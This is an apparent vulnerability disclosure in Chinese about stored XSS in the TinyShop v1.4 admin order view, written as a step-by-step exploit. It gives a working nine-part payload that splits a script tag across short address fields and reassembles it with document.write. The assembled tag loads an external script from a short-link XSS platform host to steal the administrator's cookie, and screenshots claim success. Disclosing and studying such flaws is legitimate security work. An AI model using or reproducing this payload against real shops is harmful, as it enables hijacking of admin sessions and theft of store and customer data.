Tinyshopv1.4用九笔恶意订单打后台

### 简要描述： 后台储存型xss,获取管理cookie. ### 详细说明： 上午上课的时候，和傻强聊天： 我："傻强你有女朋友吗？" 傻强："有啊？" 我："那你记得你女朋友生日吗？" 傻强："等下，我去看下生产日期。。。" 我："。。。。" TinyshopV1.4: 1、注册账号 2、添加地址 3、买东西，提交订单 4、管理查看订单，然后后台加载js代码 5、xss平台查看cookie 注册账号我就不说了： 添加地址处：（箭头所指处可控） [<img src="https://images.seebug.org/upload/201504/171307211107f5b7c8874a5519effef9ac95d12d.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/171307211107f5b7c8874a5519effef9ac95d12d.png) 但是后台可以利用的参数只有： [<img src="https://images.seebug.org/upload/201504/17130818ee7172758c1485547f13e7d68269e80b.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/17130818ee7172758c1485547f13e7d68269e80b.png) 而且长度只有： [<img src="https://images.seebug.org/upload/201504/1713092500b19938f4b3da43dc2bc98a60941263.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/1713092500b19938f4b3da43dc2bc98a60941263.png) 加起来也只有40字符，好像不够啊~~~ 不过后台订单是这样显示的： [<img src="https://images.seebug.org/upload/201504/17131422c00a1c2ad9b15c4b9c4b8c704abcfa72.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/17131422c00a1c2ad9b15c4b9c4b8c704abcfa72.png) 那么，我们就分几次加载js代码就好了： 构造出9个恶意地址： ``` p1<script>x=/**/"<scr"</script> p2<script>x%2B=/**/"ipt "</script> p3<script>x%2B=/**/"src="</script> p4<script>x%2B=/**/"//t.c"</script> p5<script>x%2B=/**/"n/RAC"</script> p6<script>x%2B=/**/"HQ7S><"</script> p7<script>x%2B=/**/"\/sc"</script> p8<script>x%2B=/**/"ript>"</script> p<script>document./**/write(x)</script> ``` 然后添加进去： [<img src="https://images.seebug.org/upload/201504/17131658e976e074ea9cb6ef69746020a264a1ec.png" alt="222.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/17131658e976e074ea9cb6ef69746020a264a1ec.png) 然后按p--->p1的地址顺序，买8样东西，提交订单： [<img src="https://images.seebug.org/upload/201504/1713191084ea7bddbd9b110239be3ed4d9009820.png" alt="0.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/1713191084ea7bddbd9b110239be3ed4d9009820.png) 体力活啊~~~ [<img src="https://images.seebug.org/upload/201504/17132435e09909fa5c97d18be8e041fcc0c4ef19.png" alt="77.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/17132435e09909fa5c97d18be8e041fcc0c4ef19.png) 如上所示，js代码已经加载了： [<img src="https://images.seebug.org/upload/201504/17132609b9de89b3e2eb93b29008510310b98d6f.png" alt="02.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/17132609b9de89b3e2eb93b29008510310b98d6f.png) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201504/171326531721d133cc658e75565ef195536881a6.png" alt="77.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/171326531721d133cc658e75565ef195536881a6.png) [<img src="https://images.seebug.org/upload/201504/17132713ed2e4a2a892661bd6427415d6a20c475.png" alt="02.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/17132713ed2e4a2a892661bd6427415d6a20c475.png)